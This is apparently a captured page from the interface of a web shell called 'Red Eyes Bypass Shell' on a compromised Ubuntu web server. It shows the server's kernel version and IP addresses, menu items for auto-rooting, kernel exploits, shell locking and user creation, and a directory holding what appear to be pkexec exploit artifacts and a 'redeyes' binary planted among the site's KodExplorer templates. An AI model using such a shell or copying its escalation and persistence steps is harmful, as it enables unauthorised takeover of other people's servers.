Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
template /
common /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
footer.html
986
B
-rwxr-xr-x
footerCommon.html
1.68
KB
-rwxr-xr-x
header.html
2.19
KB
-rwxr-xr-x
navbar.html
5.39
KB
-rwxr-xr-x
navbarShare.html
2.73
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
showTips.html
3.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.html
<?php Hook::trigger('templateCommonHeaderStart'); ?> <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta http-equiv="Content-Script-Type" content="text/javascript"> <meta http-equiv="Cache-Control" content="no-transform"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"> <meta name="renderer" content="webkit"> <meta name="description" itemprop="description" content="<?php echo LNG('kod_meta_description');?>"> <meta name="keywords" content="<?php echo LNG('kod_meta_keywords');?>" /> <meta name="generator" content="<?php echo LNG('kod_meta_name').' '.KOD_VERSION;?>"/> <meta name="author" content="<?php echo LNG('kod_meta_name');?>" /> <meta name="copyright" content="<?php echo LNG('kod_meta_copyright');?>" /> <meta itemprop="image" content="<?php echo STATIC_PATH;?>images/common/ico.png?ver=<?php echo KOD_VERSION;?>" /> <link href="<?php echo STATIC_PATH;?>images/common/ico.png?ver=<?php echo KOD_VERSION;?>" rel="Shortcut Icon" type="image/x-icon"> <link href="<?php echo STATIC_PATH;?>images/common/ico.png?ver=<?php echo KOD_VERSION;?>" rel="icon" type="image/x-icon"> <link href="<?php echo STATIC_PATH;?>style/common.css?ver=<?php echo KOD_VERSION;?>" rel="stylesheet"/> <link href="./static/style/font-awesome/css/font-awesome.css?ver=<?php echo KOD_VERSION;?>" rel="stylesheet"> <link href="./?share/manifest" rel="manifest" /> <!--[if IE 7]> <link rel="stylesheet" href="./static/style/font-awesome/css/font-awesome-ie7.css"> <![endif]--> <?php Hook::trigger('templateCommonHeader'); function pageBackground(){ $arr = explode(',',$GLOBALS['config']['settingSystem']['wallpageLogin']); $background = $arr[mt_rand(0,count($arr)-1)]; if(!$background){ $background = 'linear-gradient(160deg, #5648c1, #6fe3e7)'; }else if(!strstr($background,'/')){ $background = "url('./static/images/wall_page/{$background}.jpg')"; }else{ $background = "url('{$background}')"; } return "<style type='text/css'>.aero:before,.aero:after,.background{background-color:#bbb;background-image:{$background};}</style>\n"; } ?>
Close